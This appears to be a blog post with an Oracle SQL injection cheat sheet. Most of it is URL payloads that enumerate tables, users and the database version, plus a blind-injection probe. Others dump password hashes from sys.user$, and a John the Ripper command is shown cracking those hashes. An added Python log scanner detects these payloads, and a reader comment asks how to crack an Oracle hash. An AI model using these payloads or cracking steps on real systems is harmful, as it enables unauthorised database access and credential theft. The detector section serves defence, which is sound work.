1. Finding table names
select table_name from user_tables
Example:-
http://192.168.2.199/ora.php?id=101+union+all+select+table_name+from+user_tables
Blind Injection:
http://192.168.2.199/ora.php?id=101+and+ascii(substr((select+table_name+from+user_tables+where+rownum=1),1,1))>100
———————————————–
2. Iterating through the different rows:
Unfortunately it is not as straightforward: there is no LIMIT clause in Oracle. Instead the rows are numbered with rownum inside a subquery and the outer query picks one of them (rownum is assigned as rows are fetched, so a bare "where rownum = 2" never matches; numbering the rows in a subquery first makes the comparison work).
Syntax:-
select column_1, column_2 from (select rownum r_, column_1, column_2 from table_1, table_2 where field_3 = 'some value') where r_ = 2
EXAMPLE:-
http://192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM+USER_TABLES)+WHERE+R=1
————————————————————————–
3. Finding column names:
select column_name from user_tab_columns
————————————————————————–
4. Finding Version:
Select banner from v$version
———————————————————————–
5. Finding Database user names:-
http://192.168.2.199/ora.php?id=101+union+all+select+username,null+from+all_users
———————————————————————
6. Finding password hashes (the user in the connection string should be a DBA):
select name, astatus, password from sys.user$ where astatus = 0;
(astatus = 0 selects only the users whose accounts are not locked)
example:-
http://192.168.2.199/ora.php?id=101+union+all+select+name||'--'||password+from+sys.user$
In the above example I had only one column to select a string from the database, so I concatenated the
username and password fields together, separated with '--'.
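As an added defensive example (not part of the original post), the following Python scans web server access log lines for the Oracle-specific injection patterns shown in sections 1 through 6: UNION ... SELECT against the user_tables, user_tab_columns, all_users, v$version and sys.user$ views, the rownum subquery, and the ascii(substr(...)) blind probe. The combined log format, the sample log lines and the high/low severity split are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus
# Signatures for the Oracle-specific injection patterns described in this post.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "blind_ascii_substr": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "rownum_paging": re.compile(r"\brownum\b", re.I),
    "oracle_dictionary": re.compile(
        r"\b(?:user_tables|user_tab_columns|all_users)\b|v\$version|sys\.user\$", re.I),
}
# Only these two are strong enough on their own; the others are supporting evidence.
PRIMARY = {"union_select", "blind_ascii_substr"}

# Combined-log-format line (assumed): ip ident user [time] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$')

def normalize(path):
    # Decode twice to catch double URL encoding, then collapse /**/ comment tricks.
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(unquote_plus(path)))

def classify(path):
    # Sorted names of the signatures that match the decoded request path.
    text = normalize(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def severity(hits):
    if not hits:
        return None
    return "high" if PRIMARY & set(hits) else "low"

def scan_log(lines):
    # (ip, path, hits, severity) for each parseable line with at least one hit.
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (hits := classify(m["path"])):
            findings.append((m["ip"], m["path"], hits, severity(hits)))
    return findings

# Constructed sample lines mirroring the requests in this post; not real traffic.
SAMPLE_LOG = [
    '192.168.2.50 - - [15/Jan/2008:15:19:00 +0000] "GET /ora.php?id=101 HTTP/1.1" 200 512',
    '192.168.2.50 - - [15/Jan/2008:15:19:05 +0000] "GET /ora.php?id=101+union+all+select'
    '+table_name+from+user_tables HTTP/1.1" 200 2048',
    '192.168.2.50 - - [15/Jan/2008:15:19:09 +0000] "GET /ora.php?id=101+and+ascii(substr(('
    'select+table_name+from+user_tables+where+rownum=1),1,1))>100 HTTP/1.1" 200 512',
    '192.168.2.50 - - [15/Jan/2008:15:19:12 +0000] "GET /ora.php?id=101+UNION+ALL+SELECT+'
    'TABLE_NAME+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM+USER_TABLES)+WHERE+R=1 HTTP/1.1" 200 2048',
]
```

The rownum keyword and dictionary-view names also show up in legitimate traffic, which is why they only raise a low-severity finding unless paired with a UNION or blind-probe signature.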
—————————————————————————-
7. Cracking passwords using john the ripper:-
thanks to pentestmonkey for this
$ ./john --rules --wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt --format=oracle ~/opass
Loaded 14 password hashes with 14 different salts (Oracle [oracle])
DIP (DIP)
ORACLE (FLOWS_020100)
ORACLE (FLOWS_FILES)
ORACLE (XDB)
ORACLE (CTXSYS)
PASSWORD (HR)
PASSWORD (SYSTEM)
PASSWORD (SYS)
TEST (TEST2)
TEST1 (TEST1)
——————————————————————————
What else do you want from a SQL injection?
3:19 pm on January 15th, 2008
Hello everyone!
I found this very useful site, and thanks to all the guys that took part in it.
I'm trying to patch john (1.7.2) in order to crack Oracle passwords, but I meet a lot of problems.
I saw this line: "$ ./john --rules --wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt --format=oracle ~/opass" and have 2 questions:
- What does the opass file look like?
- Which version of john has been patched?
I saw on the openwall site that the 1.7.2 version could handle the Oracle format, but with grep I found nothing about ora / oracle, and I cannot use the -format=oracle since I get the following message:
Unknown ciphertext format name requested
Moreover, I tried to crack a file which contains an Oracle hash like the following:
DBSNMP:E066D214D5421CCC
But it doesn't work.
Can anyone help please?